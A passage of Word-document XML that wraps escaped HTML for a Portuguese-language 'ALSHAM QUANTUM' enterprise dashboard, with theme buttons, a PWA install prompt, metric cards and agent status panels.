    </w:p>
    <w:p w14:paraId="7F8909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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730BB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&lt;body class="theme-quantum-glass"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3390C0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Particles System --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533296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&lt;div id="particles-container"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BEA720" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1E6B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Connection Status --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091AE7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&lt;div class="connection-status"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68378F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class="status-dot" id="connection-dot"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3687FF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&lt;span id="connection-text"&gt;Conectando...&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D5C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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707F8C39" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683363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Theme Switcher --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168150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&lt;div class="theme-switcher"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA0B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class="theme-btn active" data-theme="quantum-glass" style="background: linear-gradient(45deg, #1a1a2e, #F4D03F);" title="Quantum Glass" aria-label="Tema Quantum Glass"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C7E7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class="theme-btn" data-theme="corporate-void" style="background: linear-gradient(45deg, #020C1B, #6C3483);" title="Corporate Void" aria-label="Tema Corporate Void"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA5D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class="theme-btn" data-theme="enterprise-azure" style="background: linear-gradient(45deg, #1F618D, #3f51b5);" title="Enterprise Azure" aria-label="Tema Enterprise Azure"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F38E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class="theme-btn" data-theme="quantum-matrix" style="background: linear-gradient(45deg, #2ECC71, #00f5ff);" title="Quantum Matrix" aria-label="Tema Quantum Matrix"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9E0B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class="theme-btn" data-theme="platinum-executive" style="background: linear-gradient(45deg, #f5f7fa, #667eea);" title="Platinum Executive" aria-label="Tema Platinum Executive"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018DD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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED1A25" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4710F0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PWA Install Prompt --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDCEB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&lt;div class="install-prompt" id="install-prompt"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D7A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class="flex items-center justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E03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class="flex-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EFEE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&lt;h3 class="font-bold text-lg"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📱</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Instalar ALSHAM QUANTUM&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8DFE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&lt;p class="text-sm opacity-75"&gt;Acesse instantaneamente de qualquer lugar&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466E1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19F380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class="flex gap-2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8AF9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&lt;button onclick="installPWA()" class="btn"&gt;Instalar&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47965C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&lt;button onclick="dismissInstall()" class="text-sm opacity-75"&gt;Não&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5B96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4A991B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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB99F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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6232AB31" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDE6F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Main Container --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D40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&lt;div class="main-container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FB5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Header --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E50C1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&lt;header class="text-center mb-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1D5F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&lt;h1 class="text-4xl md:text-6xl font-bold orbitron mb-4" style="background: linear-gradient(45deg, var(--accent-primary), var(--accent-secondary)); -webkit-background-clip: text; -webkit-text-fill-color: transparent;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D7AE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ALSHAM QUANTUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5747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&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685169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&lt;p class="text-lg md:text-xl text-secondary mb-2"&gt;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QUANTUM-POWERED NEURAL PLATFORM&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164469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&lt;p class="text-sm md:text-lg opacity-80"&gt;Advanced Enterprise Intelligence • Global Commerce Innovation&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5987CE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class="mt-4 text-sm opacity-60"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA27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&lt;span id="version-info"&gt;Enterprise Edition v2.0&lt;/span&gt; | </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAC0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&lt;span id="build-date"&gt;Build: 21/12/2024&lt;/span&gt; |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DAE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&lt;span class="font-semibold" style="color: var(--accent-primary);"&gt;ALSHAM GLOBAL COMMERCE&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242734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0F2812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&lt;/header&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F62E3A7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC44A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Quantum Counter --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085B5F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class="glass-card quantum-counter mb-8" role="region" aria-label="Contador Principal"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A31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class="quantum-counter-number orbitron" id="quantum-counter" aria-live="polite"&gt;0&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A6C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class="text-xl md:text-2xl font-semibold mb-2" style="color: var(--accent-primary);"&gt;NEURAL CYCLES PROCESSED&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E76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class="text-base md:text-lg mb-2" id="uptime-display"&gt;System Uptime: 0d 0h 0m&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133FA8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class="text-sm opacity-75"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20EF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&lt;span id="cycles-per-second"&gt;0.000&lt;/span&gt; cycles/sec | </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668908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&lt;span id="performance-indicator"&gt;Performance: 0%&lt;/span&gt; |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209CB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&lt;span id="efficiency-indicator"&gt;Efficiency: 0%&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC74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70669F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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB9FA1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F27A0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System Metrics Grid --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52C2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class="metrics-grid"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F609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class="glass-card card-3d p-4 md:p-6" role="region" aria-label="Enterprise Status"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D840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class="flex items-center justify-between mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173FCF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&lt;h3 class="text-base md:text-lg font-semibold"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏢</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ENTERPRISE STATUS&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06153B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class="w-4 h-4 bg-green-400 rounded-full animate-pulse" aria-label="Sistema Online"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A139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7F2778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class="text-2xl md:text-3xl font-bold orbitron" id="overall-performance" aria-live="polite"&gt;0%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28401B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class="text-xs md:text-sm opacity-75"&gt;Quantum Performance Index&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D3B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7F980F33" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078C1B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class="glass-card card-3d p-4 md:p-6" role="region" aria-label="Neural Agents"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FB6C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class="flex items-center justify-between mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8724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&lt;h3 class="text-base md:text-lg font-semibold"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NEURAL AGENTS&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47919D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&lt;i class="fas fa-microchip text-xl md:text-2xl" style="color: var(--accent-primary);" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3852EE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60961E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class="text-2xl md:text-3xl font-bold orbitron" id="active-agents" aria-live="polite"&gt;3&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1113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class="text-xs md:text-sm opacity-75"&gt;Active / 3 Total&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C26A7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71EF70BA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C476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class="glass-card card-3d p-4 md:p-6" role="region" aria-label="Enterprise Value"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51069C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class="flex items-center justify-between mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A081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&lt;h3 class="text-base md:text-lg font-semibold"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💎</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ENTERPRISE VALUE&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5E0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&lt;i class="fas fa-gem text-xl md:text-2xl" style="color: var(--accent-tertiary);" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97FD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40E77E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class="text-lg md:text-2xl font-bold orbitron"&gt;R$ 1.430.000&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE01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class="text-xs md:text-sm opacity-75"&gt;Quantum Neural Platform&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2BC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2136BAB1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA4EE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class="glass-card card-3d p-4 md:p-6" role="region" aria-label="Business Intelligence"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116306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class="flex items-center justify-between mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F09CE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&lt;h3 class="text-base md:text-lg font-semibold"&gt;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BUSINESS INSIGHTS&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B5C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&lt;i class="fas fa-chart-line text-xl md:text-2xl" style="color: var(--accent-secondary);" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62EF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749447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class="text-sm md:text-lg font-semibold" id="business-insight" aria-live="polite"&gt;Analyzing market data...&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7790A6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class="text-xs md:text-sm opacity-75"&gt;Real-time Analytics&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035067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3E90FC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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F1990" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F491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Agents Grid --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198307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class="agent-grid"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D226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&lt;!-- Core Agent --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317BA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class="glass-card card-3d p-4 md:p-6 cursor-pointer" onclick="openAgentModal('core')" role="button" aria-label="Abrir detalhes do Core Agent" tabindex="0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A70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class="flex items-start justify-between mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A475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class="flex-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B64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&lt;h3 class="text-lg md:text-xl font-bold flex items-center mb-2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C956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&lt;i class="fas fa-cogs mr-2 text-lg" style="color: #FF6B6B;" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1266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Core Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6303AE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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4935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&lt;p class="text-xs md:text-sm opacity-75"&gt;Neural Processing &amp; Optimization&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683CB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19180B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class="progress-ring ml-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A780D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&lt;svg width="100" height="100" aria-label="Performance do Core Agent"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA337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&lt;circle cx="50" cy="50" r="40" fill="none" stroke="rgba(255,255,255,0.1)" stroke-width="6"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62861B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&lt;circle cx="50" cy="50" r="40" fill="none" stroke="#FF6B6B" stroke-width="6" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE6EB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stroke-linecap="round" id="core-progress" stroke-dasharray="251" stroke-dashoffset="251"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF422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&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E438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class="absolute inset-0 flex items-center justify-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C686D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&lt;span class="text-lg font-bold orbitron" id="core-performance" aria-live="polite"&gt;75%&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E26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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A15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45B336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073BEE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class="grid grid-cols-2 gap-4 text-xs md:text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21277B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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AA78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class="opacity-75"&gt;Cycles:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D406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class="font-semibold" id="core-cycles" aria-live="polite"&gt;0&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D0C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127B2D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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7A13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class="opacity-75"&gt;Algorithm:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585169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class="font-semibold" id="core-technique" aria-live="polite"&gt;Quantum ML&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C20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717ADD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118E57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1CC8310C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470E4E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&lt;!-- Learn Agent --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF41B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class="glass-card card-3d p-4 md:p-6 cursor-pointer" onclick="openAgentModal('learn')" role="button" aria-label="Abrir detalhes do Learn Agent" tabindex="0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E009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class="flex items-start justify-between mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA61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class="flex-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1DA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&lt;h3 class="text-lg md:text-xl font-bold flex items-center mb-2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58434D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&lt;i class="fas fa-brain mr-2 text-lg" style="color: #9333EA;" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904AD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Learning Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3379C1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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610FE3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&lt;p class="text-xs md:text-sm opacity-75"&gt;Adaptive Neural Networks&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39997A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4FEA53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class="progress-ring ml-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9CC3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&lt;svg width="100" height="100" aria-label="Performance do Learn Agent"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78122B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&lt;circle cx="50" cy="50" r="40" fill="none" stroke="rgba(255,255,255,0.1)" stroke-width="6"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C180B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&lt;circle cx="50" cy="50" r="40" fill="none" stroke="#9333EA" stroke-width="6" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BC1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stroke-linecap="round" id="learn-progress" stroke-dasharray="251" stroke-dashoffset="251"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF36F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&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F18FC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class="absolute inset-0 flex items-center justify-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA76F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&lt;span class="text-lg font-bold orbitron" id="learn-performance" aria-live="polite"&gt;83%&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7748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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511808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2217DF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08E8B8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class="grid grid-cols-2 gap-4 text-xs md:text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EBDC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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D71E5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class="opacity-75"&gt;Accuracy:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658F99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class="font-semibold" id="learn-accuracy" aria-live="polite"&gt;94.7%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC12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7170DA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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B97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class="opacity-75"&gt;Model:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D692C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class="font-semibold" id="learn-model" aria-live="polite"&gt;Quantum Neural&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7E8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19CF22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3A7BF9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41253271" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0CEA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&lt;!-- Guard Agent --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498A15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class="glass-card card-3d p-4 md:p-6 cursor-pointer" onclick="openAgentModal('guard')" role="button" aria-label="Abrir detalhes do Guard Agent" tabindex="0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5158D8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class="flex items-start justify-between mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586CB3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class="flex-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2146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&lt;h3 class="text-lg md:text-xl font-bold flex items-center mb-2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608CB9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&lt;i class="fas fa-shield-alt mr-2 text-lg" style="color: #00F5FF;" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB2F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Security Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550921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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6276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&lt;p class="text-xs md:text-sm opacity-75"&gt;Enterprise Protection &amp; Monitoring&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F0C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55370C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class="progress-ring ml-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BED75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&lt;svg width="100" height="100" aria-label="Uptime do Guard Agent"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBFB6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&lt;circle cx="50" cy="50" r="40" fill="none" stroke="rgba(255,255,255,0.1)" stroke-width="6"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CD65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&lt;circle cx="50" cy="50" r="40" fill="none" stroke="#00F5FF" stroke-width="6" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC914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stroke-linecap="round" id="guard-progress" stroke-dasharray="251" stroke-dashoffset="251"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A63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&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F12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class="absolute inset-0 flex items-center justify-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C06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&lt;span class="text-lg font-bold orbitron" id="guard-uptime" aria-live="polite"&gt;99.9%&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639B9F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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6447B8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2E7F19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5D00BE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class="grid grid-cols-2 gap-4 text-xs md:text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A581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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685CD4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class="opacity-75"&gt;Status:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5731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class="font-semibold" id="guard-status" aria-live="polite"&gt;SECURE&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481CC7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130C32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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F78C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class="opacity-75"&gt;Protocol:&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D477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class="font-semibold" id="guard-protocol" aria-live="polite"&gt;Quantum Shield&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F125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7F32D4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5C1D4D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6B2FFC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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08ED5F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108714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Charts Section --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29258F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class="grid grid-cols-1 lg:grid-cols-2 gap-4 md:gap-6 mb-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F43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&lt;!-- Timeline Chart --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ACAF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class="glass-card p-4 md:p-6" role="region" aria-label="Gráfico de Performance"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D050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&lt;h3 class="text-lg md:text-xl font-bold mb-4 flex items-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6CD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&lt;i class="fas fa-chart-area mr-2" style="color: var(--accent-primary);" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1390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Neural Performance Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7598A9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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAA54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class="chart-container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8458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&lt;canvas id="timelineChart" aria-label="Gráfico de performance ao longo do tempo"&gt;&lt;/canvas&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4945DA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17DBA8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60EB884C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D8B8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&lt;!-- Live Event Log --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03273D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class="glass-card p-4 md:p-6" role="region" aria-label="Log de Eventos em Tempo Real"&gt;</w:t>
      </w:r>
    </w:p>
